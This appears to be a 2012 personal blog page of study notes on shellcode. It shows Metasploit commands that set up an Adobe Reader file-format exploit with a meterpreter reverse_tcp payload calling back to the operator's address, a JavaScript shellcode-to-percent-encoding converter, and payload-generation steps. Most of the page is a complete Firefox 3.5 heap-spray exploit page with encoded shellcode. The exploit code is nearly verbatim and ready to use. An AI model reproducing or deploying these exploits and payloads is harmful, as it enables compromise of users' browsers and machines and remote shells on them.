Showing posts with label Shell Code. Show all posts
Showing posts with label Shell Code. Show all posts

Saturday, April 28, 2012

metasploit usage

1. download  and intal it
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show your the commands

3. go to metasploit website, search a vulnerability, download the specific version of the application.

4. it will like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit



5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe

6. for this case, if your shell code executed, the calculator will show up on you screen.
Posted by at No comments:
Labels: ,

Convert binary Shell code to Javascript percentage encoding 


<html>
<head>
<script language="JavaScript" type="text/javascript">
function ConvertShellCode(strdata)
{
    var s = new String(strdata);
    s = s.replace(/[\s\\x]/g, '');
    var strcode = '';

    for(var idx=0; idx<s.length; idx+=4)
        strcode += "%u" + s.substr(idx+2,2) + s.substr(idx+0,2);

    document.forms.ShellToJavascript.decode.value = strcode;
}
</script>
</head>
<body>
<form name="ShellToJavascript" method="post">
<textarea rows="10" cols="100" name="encode"></textarea><br />
<textarea rows="10" cols="100" name="decode"></textarea><br />
<input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" />
</form>
</body>
</html>


http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/
Posted by at No comments:
Labels: , ,

Tuesday, April 24, 2012

How to write Shell Code; Reverse Shell code

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
Posted by at No comments:
Labels: ,

use Metasploit to generate shell code

This post explains to use metasploit to generate binary shell code:

http://www.backtrack-linux.org/forums/showthread.php?t=35480


msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf payload(exec) > set cmd taskkill /PID 12345
cmd => taskkill /PID 12345
msf payload(exec) > show options

Module options:

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   CMD       taskkill /PID 12345  yes       The command string to execute
   EXITFUNC  process              yes       Exit technique: seh, thread, process, none

msf payload(exec) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe
[*] Writing 73802 bytes to /root/windows-exec-payload.exe...
msf payload(exec) > generate -f /root/windows-exec-payload.shellcode
[*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...
Posted by at No comments:
Labels: ,

Thursday, April 19, 2012

Reverse Java Script Shell Code

http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html

It is a detailed post, but one thing I am not understand is the spider monkey part.

After using spider monkey to translate the original percentage encoding data, the result is totally different from the original data.

However, one commet of this post points out we only need to remove the "%u" and the reverse the order of original data.

Not sure which way is correct.

But it is very good post for reverse JS shell code.

BTW, I install the spider monkey on the CentOS without any problem.
Posted by at No comments:
Labels: , ,

Heap Spray Attack

http://1337day.com/exploits/9493

Vulnerability + NOP sleds + Shell Code

e.g., This is an exploitation HTML file targeting on Firefox 3.5.
It use heap spray attack to launch a calc.exe on Windows platforms
Same vulnerability exists on the same version firefox on Linux environment, but the shellcode needs to modified.


 <html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                          
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                       "%u652E%u6578%u9000");
/* Heap Spray Code */          
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}

function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}

function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }  
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

Posted by at No comments:
Labels: , ,
Subscribe to: Posts (Atom)